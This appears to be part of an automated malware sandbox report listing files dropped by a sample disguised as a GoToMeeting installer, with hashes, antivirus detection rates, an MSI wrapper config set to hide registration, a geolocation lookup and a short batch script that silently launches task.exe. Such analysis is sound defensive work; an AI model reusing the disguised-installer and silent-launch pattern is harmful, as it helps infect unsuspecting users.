                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="597689" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2684
                                                                                                                                                              Entropy (8bit):3.905611951900379
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:uiTrlKx68Wa7xNxl9Il8unOTC0X9kN5N3X/gdbESOixR9M7DHd/vc:azYBOTC0X49XiE2R9qO
                                                                                                                                                              MD5:0D35A53AA2E18AF27ADC8EAE72433041
                                                                                                                                                              SHA1:6F05D92C2341C2300EE5B350C5D2C1FF4D2CB4D0
                                                                                                                                                              SHA-256:649307B2134D62BA2F0E763A1AC0D5B9010FC1F834F0BC0D66D649FB50699556
                                                                                                                                                              SHA-512:F0198474B54A967391247AAF8267EC86BDDC25AF38AF789037D1AA51EF38D84C9A03432FB8FC90179044776E6BD4FCD9D7DA7F7FA2E1EFF5E540E694871C7AFC
                                                                                                                                                              Malicious:false
Preview:{"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"6N3Uy9nAUEqs5u96E/og0E/VJAg="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"0c/ua9Fa3AE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AAAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAvoi5tm
                                                                                                                                                              Process:C:\Users\user\task.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):962
                                                                                                                                                              Entropy (8bit):5.015105568788186
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:tkluQ+nd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qluQydRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                              MD5:8937B63DC0B37E949F38E7874886D999
                                                                                                                                                              SHA1:62FD17BF5A029DDD3A5CFB4F5FC9FE83A346FFFC
                                                                                                                                                              SHA-256:AB2F31E4512913B1E7F7ACAB4B72D6E741C960D0A482F09EA6F9D96FED842A66
                                                                                                                                                              SHA-512:077176C51DC10F155EE08326270C1FE3E6CF36C7ABA75611BDB3CCDA2526D6F0360DBC2FBF4A9963051F0F01658017389FD898980ACF7BB3B29B287F188EE7B9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              File Type:Microsoft Cabinet archive data, many, 1458311 bytes, 6 files, at 0x2c +A "data.bin" +A "g2m.dll", ID 46085, number 1, 102 datablocks, 0x1503 compression
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1458311
                                                                                                                                                              Entropy (8bit):7.999747988167558
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:24576:MHVSY+M+2UC8yJ/ROwLcE8caCO1JgAt+lyp31XQnJfHtt4lj+u1BUTsFXk:9YJ+2/8yJ5OA4COg9lyp31X01clj+u1g
                                                                                                                                                              MD5:240F5D10D0FDC6E3A73B6793E0EA260F
                                                                                                                                                              SHA1:B6B7549B2C1A98FE88DEA9F9FB462CB203647DBC
                                                                                                                                                              SHA-256:5AFA0071F63B662D93AB35E8A9A6A44B8AD439C62160388690E5E5793CB2B2D4
                                                                                                                                                              SHA-512:FAA0654A4359A90338905BCF627CB75D10D277CE8E2AAFC07ECA75EA887F54750B118042DD1E25E45C02706791EA5F5741202309928140789C319988E05F5029
                                                                                                                                                              Malicious:false
Preview:MSCF cabinet header (binary); member names readable in the header: data.bin, g2m.dll, run.bat, task.exe, task22.msi, your_package_name.dll
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: GoToMeeting 5.4.0.1082, Subject: GoToMeeting, Author: Citrix Online, a division of Citrix Systems, Inc., Keywords: Installer, Template: x64;1033, Revision Number: {0477C971-7364-4C60-9D84-EFF0F290A852}, Create Time/Date: Thu Jan 11 14:59:38 2024, Last Saved Time/Date: Thu Jan 11 14:59:38 2024, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (11.0.53.0), Security: 2
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1302528
                                                                                                                                                              Entropy (8bit):7.848370630711635
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:Ht9cpVDhqHVSY+M+2UC8yJ/ROwLcE8caCO1JgAt+lyp31CC:QpRhXYJ+2/8yJ5OA4COg9lyp31CC
                                                                                                                                                              MD5:6406CCE810C8AAA887CA6B8E004776D2
                                                                                                                                                              SHA1:1698D3D12341F3824E14F4DAE75300EEA9670797
                                                                                                                                                              SHA-256:FBFDE6F43C30F454B07DBD2FDCD83685AE0016227F5489C13CCB510A0CFF00A6
                                                                                                                                                              SHA-512:3CD6F24C1892ABD1B12A02DAC5AB53E2AFE1C68BC366D1DDB26DF1E56312DA7FF5CACA255E78CB61E3FCBBED21CD03FB8909C61302AF4DBCDDA7AD37EAC73FFA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):759284
                                                                                                                                                              Entropy (8bit):7.999779959160248
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:12288:xHfeUm3mQ6v/drDVCNSVUzIq+0hplKC8yO1//jOwL1FXM8c4Pu0FxXmV1DU30ma8:xH+I1AMKUdC8yW/jOwLX88ctA41rmaQH
                                                                                                                                                              MD5:8D9B3CA29D78CDA545CF0A3131536F17
                                                                                                                                                              SHA1:D823975E67320244F3F02A59E5D29B53E16A828B
                                                                                                                                                              SHA-256:97978EC89A58611CDEEFFC623805C91966BF1D861395082804EFE05302DAF7CD
                                                                                                                                                              SHA-512:287799D662BF3F113AAB8009503AFE7306F489B7FDAD69CEFFB190C9757412E00F6D3EEDF5D5254D90319B27577D9567DC4B67860DC0148E249C042575F4DC0D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):40376
                                                                                                                                                              Entropy (8bit):5.902054884820747
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:YRQnUhG5bZDOTpkdD82YbQkRFokFWIILPUh:FWObZDOTpk5T6zqAh
                                                                                                                                                              MD5:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              SHA1:DCC2DCB26C1649887F1D5AE557A000B5FE34BB98
                                                                                                                                                              SHA-256:796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
                                                                                                                                                              SHA-512:636A32FB8A88A542783AA57FE047B6BCA47B2BD23B41B3902671C4E9036C6DBB97576BE27FD2395A988653E6B63714277873E077519B4A06CDC5F63D3C4224E0
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: FpiUD4nYpj.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: 7Y18r(14).exe, Detection: malicious, Browse
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):617472
                                                                                                                                                              Entropy (8bit):6.064860346549003
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:mwyPp3TItEKRC3YtYq0H+J6nEYpaM7Fd5ktc2/ZLvJ6Asu/uDc:mwggE2C3YtYq0eJgEYpaMnF2LvJ9/K
                                                                                                                                                              MD5:FC284EEE599385A7AE9F098D123E983F
                                                                                                                                                              SHA1:ACAA1C92D85AFD92184D49592AED3AEAB6AD2DED
                                                                                                                                                              SHA-256:16414419A8248A4A55C05859C467D1FAFC298694F3F71916261FE2E08EBF4ABD
                                                                                                                                                              SHA-512:C2538A98DE60AEDDB72CB14513ECCE3493F04E94135182AF658D3FC6425AD890560945EFB02C956B11AA10606C95E7CB286E73C0D27E71F2B17D3494506E7123
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):615936
                                                                                                                                                              Entropy (8bit):6.064847871237935
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:DMj1AFMhjwaqawEgg+V7yhlFPvqutOVNbdjhLAOENS7ZHMls:Yj1kjaqawEgg+VmhlFnquOrbLAOFZy
                                                                                                                                                              MD5:8522CF224CB875847762353C89D2DCE2
                                                                                                                                                              SHA1:4947EF0A7B3DA4972106A6A97FFF8C03F9DB6799
                                                                                                                                                              SHA-256:3DC24E9A42D9230F4C0DB64BF11B9DF544066C80C49B2AA66CE9A01DDB8C4088
                                                                                                                                                              SHA-512:8933F0ADD139FD10F452AD18BCC400AB288AEBE5BF764DA66EB332B9B97DC56F7AAAB66FD396B0CA1BF3C29A1487255B562A97FDEFFAACC142347A95CD503350
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):70
                                                                                                                                                              Entropy (8bit):4.377806460743142
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:mKDDFARE3BF//I+K9sALX:hmRACaALX
                                                                                                                                                              MD5:F8ABF91D350D39FF1A48934B88624291
                                                                                                                                                              SHA1:88EF29FD18441C628A43925A8B32535D39E07979
                                                                                                                                                              SHA-256:5B4E3E3F739B1AE3CD907A0ABE9D5AAF51455551F69F9DA57E668F749584EFD6
                                                                                                                                                              SHA-512:3C572C7415FBC8EE5F976AC9B6CCE43C901174777C859E9461451676BD5158E940E0BD173D83D980958295CB9DAACC489F0D596D98E93F71CB81D2603F037876
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                              Preview:@echo off..setlocal..cd /d "%~dp0"..start /B "" "task.exe"..endlocal..
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):759284
                                                                                                                                                              Entropy (8bit):7.999779959160248
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:12288:xHfeUm3mQ6v/drDVCNSVUzIq+0hplKC8yO1//jOwL1FXM8c4Pu0FxXmV1DU30ma8:xH+I1AMKUdC8yW/jOwLX88ctA41rmaQH
                                                                                                                                                              MD5:8D9B3CA29D78CDA545CF0A3131536F17
                                                                                                                                                              SHA1:D823975E67320244F3F02A59E5D29B53E16A828B
                                                                                                                                                              SHA-256:97978EC89A58611CDEEFFC623805C91966BF1D861395082804EFE05302DAF7CD
                                                                                                                                                              SHA-512:287799D662BF3F113AAB8009503AFE7306F489B7FDAD69CEFFB190C9757412E00F6D3EEDF5D5254D90319B27577D9567DC4B67860DC0148E249C042575F4DC0D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):617472
                                                                                                                                                              Entropy (8bit):6.064860346549003
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:mwyPp3TItEKRC3YtYq0H+J6nEYpaM7Fd5ktc2/ZLvJ6Asu/uDc:mwggE2C3YtYq0eJgEYpaMnF2LvJ9/K
                                                                                                                                                              MD5:FC284EEE599385A7AE9F098D123E983F
                                                                                                                                                              SHA1:ACAA1C92D85AFD92184D49592AED3AEAB6AD2DED
                                                                                                                                                              SHA-256:16414419A8248A4A55C05859C467D1FAFC298694F3F71916261FE2E08EBF4ABD
                                                                                                                                                              SHA-512:C2538A98DE60AEDDB72CB14513ECCE3493F04E94135182AF658D3FC6425AD890560945EFB02C956B11AA10606C95E7CB286E73C0D27E71F2B17D3494506E7123
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):70
                                                                                                                                                              Entropy (8bit):4.377806460743142
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:mKDDFARE3BF//I+K9sALX:hmRACaALX
                                                                                                                                                              MD5:F8ABF91D350D39FF1A48934B88624291
                                                                                                                                                              SHA1:88EF29FD18441C628A43925A8B32535D39E07979
                                                                                                                                                              SHA-256:5B4E3E3F739B1AE3CD907A0ABE9D5AAF51455551F69F9DA57E668F749584EFD6
                                                                                                                                                              SHA-512:3C572C7415FBC8EE5F976AC9B6CCE43C901174777C859E9461451676BD5158E940E0BD173D83D980958295CB9DAACC489F0D596D98E93F71CB81D2603F037876
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:@echo off..setlocal..cd /d "%~dp0"..start /B "" "task.exe"..endlocal..
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):40376
                                                                                                                                                              Entropy (8bit):5.902054884820747
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:YRQnUhG5bZDOTpkdD82YbQkRFokFWIILPUh:FWObZDOTpk5T6zqAh
                                                                                                                                                              MD5:F1B14F71252DE9AC763DBFBFBFC8C2DC
                                                                                                                                                              SHA1:DCC2DCB26C1649887F1D5AE557A000B5FE34BB98
                                                                                                                                                              SHA-256:796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
                                                                                                                                                              SHA-512:636A32FB8A88A542783AA57FE047B6BCA47B2BD23B41B3902671C4E9036C6DBB97576BE27FD2395A988653E6B63714277873E077519B4A06CDC5F63D3C4224E0
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: GoToMeeting 5.4.0.1082, Subject: GoToMeeting, Author: Citrix Online, a division of Citrix Systems, Inc., Keywords: Installer, Template: x64;1033, Revision Number: {0477C971-7364-4C60-9D84-EFF0F290A852}, Create Time/Date: Thu Jan 11 14:59:38 2024, Last Saved Time/Date: Thu Jan 11 14:59:38 2024, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (11.0.53.0), Security: 2
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1302528
                                                                                                                                                              Entropy (8bit):7.848370630711635
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:Ht9cpVDhqHVSY+M+2UC8yJ/ROwLcE8caCO1JgAt+lyp31CC:QpRhXYJ+2/8yJ5OA4COg9lyp31CC
                                                                                                                                                              MD5:6406CCE810C8AAA887CA6B8E004776D2
                                                                                                                                                              SHA1:1698D3D12341F3824E14F4DAE75300EEA9670797
                                                                                                                                                              SHA-256:FBFDE6F43C30F454B07DBD2FDCD83685AE0016227F5489C13CCB510A0CFF00A6
                                                                                                                                                              SHA-512:3CD6F24C1892ABD1B12A02DAC5AB53E2AFE1C68BC366D1DDB26DF1E56312DA7FF5CACA255E78CB61E3FCBBED21CD03FB8909C61302AF4DBCDDA7AD37EAC73FFA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):615936
                                                                                                                                                              Entropy (8bit):6.064847871237935
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:DMj1AFMhjwaqawEgg+V7yhlFPvqutOVNbdjhLAOENS7ZHMls:Yj1kjaqawEgg+VmhlFnquOrbLAOFZy
                                                                                                                                                              MD5:8522CF224CB875847762353C89D2DCE2
                                                                                                                                                              SHA1:4947EF0A7B3DA4972106A6A97FFF8C03F9DB6799
                                                                                                                                                              SHA-256:3DC24E9A42D9230F4C0DB64BF11B9DF544066C80C49B2AA66CE9A01DDB8C4088
                                                                                                                                                              SHA-512:8933F0ADD139FD10F452AD18BCC400AB288AEBE5BF764DA66EB332B9B97DC56F7AAAB66FD396B0CA1BF3C29A1487255B562A97FDEFFAACC142347A95CD503350
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1458
                                                                                                                                                              Entropy (8bit):3.6672578438154977
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:zoEwUodX8DW8XjULX1+GukdrFF4YI9Y4YI9Nyq4YI9v5Ru9:zZwrYaukhFF4YN4Yuv4YN9
                                                                                                                                                              MD5:419617EE7641A991D2B1DD3144248EF7
                                                                                                                                                              SHA1:7C91BB20A4106692332E853E0038D179BEBBE64F
                                                                                                                                                              SHA-256:C017A94813B6243388EAF8D37F93264DE1D50BE77802921289D06ED8630BC346
                                                                                                                                                              SHA-512:37020EB9FCFD2C07DE77DCCCC31DECE61734DC5A705F1C4202AE822B4820C62884269844913925036EF055F4B09D67E6E64B2107721055EF5D98381AED2988F8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=.7.-.Z.i.p.|.B.r.a.v.e.S.o.f.t.w.a.r.e. .B.r.a.v.e.-.B.r.o.w.s.e.r...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.H.i.d.d.e.n...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.n.e.v.e.r...B.a.s.e.N.a.m.e.=.t.a.s.k...e.x.e...C.a.b.H.a.s.h.=.5.a.f.a.0.0.7.1.f.6.3.b.6.6.2.d.9.3.a.b.3.5.e.8.a.9.a.6.a.4.4.b.8.a.d.4.3.9.c.6.2.1.6.0.3.8.8.6.9.0.e.5.e.5.7.9.3.c.b.2.b.2.d.4...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=.*.F.I.L.E.S.D.I.R.*...U.I.L.e.v.e.l.=.5...F.o.c.u.s.=.y.e.s...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.7.0.3.9.4.d.6.c.-.f.5.1.f.-.4.7.2.d.-.a.6.f.7.-.9.1.5.6.5.4.c.f.9.b.1.e.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.7.0.3.9.4.d.6.c.-.f.5.1.f.-.4.7.2.d.-.a.6.f.7.-.9.1.5.6.5.4.c.f.9.b.1.e.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.i.l.e.=...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.P.a.
                                                                                                                                                              Process:C:\Users\user\task.exe
                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x53c051b8, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16252928
                                                                                                                                                              Entropy (8bit):0.9688562385717057
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:IoTz5eo1CKGP5q/XiE9ENP//Xsx0BnNP//Xsx0Bn695nu8eX8e58ekpjX8ev8efS:Ih+NFrVo90FdLhVKsKan19
                                                                                                                                                              MD5:6BD1EDC3FC67AB10B5817EC905A47263
                                                                                                                                                              SHA1:C3C64EDC4B0C1BB8248E038FBBFB283996F40966
                                                                                                                                                              SHA-256:AAFE33B8082214A1EED78AE8F4A32DBF3A232BE4512FEF0EE90A79AF00837C73
                                                                                                                                                              SHA-512:1F74EBAFF67916D79D322B66F521F2302E4AAE24F41A9E7DB5C67F4578A3A32B4DE9DA856EA55871A6276B4713A09FB8D12B1D121F512C03EC937C8C1EA4E472
                                                                                                                                                              Malicious:false
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4198
                                                                                                                                                              Entropy (8bit):5.483165048243419
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:0q8NkGS1fuxv6C58rh/cI9URoDotorujBauvqvV2JkCc1aSDS4S4SDSmI4a:/8NBSkaeoDUh9mVikCwR
                                                                                                                                                              MD5:081215CC735B1BD922A04B1FF884AA43
                                                                                                                                                              SHA1:ABA81F23F307A5AB74C2B2C6D94119F06EFC889D
                                                                                                                                                              SHA-256:8920FC9A2BF08C6F350B83D47F9697061D2EFFCEA2604029AF7FDF5F88A05C40
                                                                                                                                                              SHA-512:2DDBB384EC794C59171715A042BCB0A7BE54EF9CE1206FFCF5237318D5F453BF9941866F13BF7D108D9CEDD425F8533BB0D2DB03C0BEBD41DF0758F6D37866BD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fre":{"oem_bookmarks_set":true},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC+iLm2Zr7aQKM/QMbOv3p0EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABP3bqCLIIKULZltKi9naM/NsvjHziFuEObTMT1vXQENAAAAAAOgAAAAAIAACAAAABtMxtfCiQ0HI8W/DJehMIUsnPu/LG+d5TdDuLQSLjn5DAAAAC6rCjpeKykHLu1xImseQaYTi3WjJT27iNlfniGO7Co3Jrxmxi3LVrts6ZkzhjRGSVAAAAAHDkHlxhbJAEPhcLOFI09zETSMTMr9eCqhMrME9N2qmM6xEFhdzzUGADkw/sDe37nc9mKZvhc9lVMimzve
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3282
                                                                                                                                                              Entropy (8bit):5.588111273444896
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:0q8NkC1fuxv6CeHBauvqvV2JkCc1aSDS4S4SDSmI4a:/8NbkimVikCwR
                                                                                                                                                              MD5:43ED9F7B4B26E986E54D5D067D056CF7
                                                                                                                                                              SHA1:FFA37C0174EA68D6191C05B416E7FEC577E33996
                                                                                                                                                              SHA-256:1242466F0FB5EFE3382DEF81E4A08193F45892FDFAD770B926EAA205A89A4B17
                                                                                                                                                              SHA-512:6917CC8AA0E37D1069294AB81C37F950D64E63F9D6442E1E6BD31BE2E3B13CDBDDB91057A46419EC6B0F07F38987C416CD5711402152435203079E88BF986A77
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC+iLm2Zr7aQKM/QMbOv3p0EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABP3bqCLIIKULZltKi9naM/NsvjHziFuEObTMT1vXQENAAAAAAOgAAAAAIAACAAAABtMxtfCiQ0HI8W/DJehMIUsnPu/LG+d5TdDuLQSLjn5DAAAAC6rCjpeKykHLu1xImseQaYTi3WjJT27iNlfniGO7Co3Jrxmxi3LVrts6ZkzhjRGSVAAAAAHDkHlxhbJAEPhcLOFI09zETSMTMr9eCqhMrME9N2qmM6xEFhdzzUGADkw/sDe37nc9mKZvhc9lVMimzveK0Jng=="},"policy":{"last_statist
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 33554432.000000, slope 293373858522878600971173199085568.000000
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                              Entropy (8bit):0.22190570136812404
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:OmJO+i7tYUiQUkR7iRGaIFfcRGg1DRFFbqyRG4bpYi3zFH:OmA+wtYnQp9LaIFfpg1HFbq7kp1zF
                                                                                                                                                              MD5:96CC566EBCA09C0AAAD45C6727E9AE15
                                                                                                                                                              SHA1:35D6E3649A2AE249FD35D5E93EEFAB7189877190
                                                                                                                                                              SHA-256:6099CEB2BC18E1354BD83A5050960E82B305D7F02B789D3605CC56C00851AB32
                                                                                                                                                              SHA-512:002ACEB0AC836D857FA547F51A47C507AC46BF77F45F869D28FB51820F74B73F4FCE4825C572173C7941037E49D2C05A38FFE0C5A60E99F5BFE1159826E045DD
                                                                                                                                                              Malicious:false
